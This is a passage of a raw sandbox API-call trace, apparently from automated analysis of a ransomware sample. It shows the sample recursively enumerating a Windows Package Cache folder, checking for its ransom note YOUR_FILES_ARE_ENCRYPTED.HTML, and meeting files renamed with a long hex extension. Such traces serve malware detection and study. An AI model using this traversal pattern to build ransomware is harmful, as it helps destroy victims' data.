lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb044e343, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb044e343, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb045a78e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63ab68, dwReserved1=0x6f4630, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.568] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.568] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0110.568] GetProcessHeap () returned 0x600000 [0110.568] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{eea66967-97e2-4561-a999-5c22e3cde428}v14.25.28508\\packages\\vcruntimeminimum_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.569] GetProcessHeap () returned 0x600000 [0110.569] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.569] GetProcessHeap () returned 0x600000 [0110.569] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.570] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb04f1c5d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb04f1c5d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb04f6ab3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f46d8, dwReserved1=0x6f4628, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.570] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb04f1c5d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb04f1c5d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb04f6ab3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f46d8, dwReserved1=0x6f4628, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.570] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.570] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0110.570] GetProcessHeap () returned 0x600000 [0110.570] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{eea66967-97e2-4561-a999-5c22e3cde428}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.570] GetProcessHeap () returned 0x600000 [0110.570] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.570] GetProcessHeap () returned 0x600000 [0110.570] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.571] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb04fccdb, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb04fccdb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0501adb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.571] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb04fccdb, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb04fccdb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0501adb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.571] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.571] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0110.571] GetProcessHeap () returned 0x600000 [0110.571] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{eea66967-97e2-4561-a999-5c22e3cde428}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.572] GetProcessHeap () returned 0x600000 [0110.572] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.572] GetProcessHeap () returned 0x600000 [0110.572] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.573] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0110.573] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.573] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 86 [0110.573] GetProcessHeap () returned 0x600000 [0110.573] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.574] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0110.574] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*" [0110.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb05e9477, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0110.574] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb05e9477, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.574] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.574] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.574] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 95 [0110.574] GetProcessHeap () returned 0x600000 [0110.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.575] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0110.575] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*" [0110.575] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb05e1e0c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.575] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb05e1e0c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName="..", cAlternateFileName="")) returned 1 [0110.575] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb0582a92, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0582a92, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0110.575] StrStrIW (lpFirst="vcRuntimeAdditional_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.575] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 119 [0110.575] GetProcessHeap () returned 0x600000 [0110.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.576] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0110.576] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*" [0110.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb0582a92, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0582a92, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b868, dwReserved1=0x6f3f70, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.576] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb0582a92, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0582a92, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b868, dwReserved1=0x6f3f70, cFileName="..", cAlternateFileName="")) returned 1 [0110.576] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3166700, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc3166700, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xb071f146, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520, dwReserved0=0x63b868, dwReserved1=0x6f3f70, cFileName="cab1.cab.7EEBD4DE2F6238176BD6035C992FBDD08F9F5EC6F80B25A681125C2706CDCD5D", cAlternateFileName="CAB1CA~1.7EE")) returned 1 [0110.576] StrStrIW (lpFirst="cab1.cab.7EEBD4DE2F6238176BD6035C992FBDD08F9F5EC6F80B25A681125C2706CDCD5D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.576] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.7EEBD4DE2F6238176BD6035C992FBDD08F9F5EC6F80B25A681125C2706CDCD5D") returned 193 [0110.576] PathFindExtensionW (pszPath="cab1.cab.7EEBD4DE2F6238176BD6035C992FBDD08F9F5EC6F80B25A681125C2706CDCD5D") returned=".7EEBD4DE2F6238176BD6035C992FBDD08F9F5EC6F80B25A681125C2706CDCD5D" [0110.576] lstrlenW (lpString=".7EEBD4DE2F6238176BD6035C992FBDD08F9F5EC6F80B25A681125C2706CDCD5D") returned 65 [0110.576] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf82e000, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xbf82e000, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xbf82e000, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63b868, dwReserved1=0x6f3f70, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.576] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.576] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 148 [0110.576] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0110.576] lstrlenW (lpString=".msi") returned 4 [0110.576] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0110.576] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0582a92, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb0582a92, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb05dbcda, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b868, dwReserved1=0x6f3f70, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.577] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0582a92, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb0582a92, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb05dbcda, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b868, dwReserved1=0x6f3f70, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.577] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.577] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0110.577] GetProcessHeap () returned 0x600000 [0110.577] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.577] GetProcessHeap () returned 0x600000 [0110.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.577] GetProcessHeap () returned 0x600000 [0110.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.578] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb05e1e0c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb05e1e0c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb05e58f3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.578] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb05e1e0c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb05e1e0c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb05e58f3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.578] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.578] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0110.578] GetProcessHeap () returned 0x600000 [0110.578] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.579] GetProcessHeap () returned 0x600000 [0110.579] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.579] GetProcessHeap () returned 0x600000 [0110.579] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.579] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb05e9477, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb05e9477, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb06cad5a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.579] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb05e9477, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb05e9477, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb06cad5a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.579] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0110.579] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 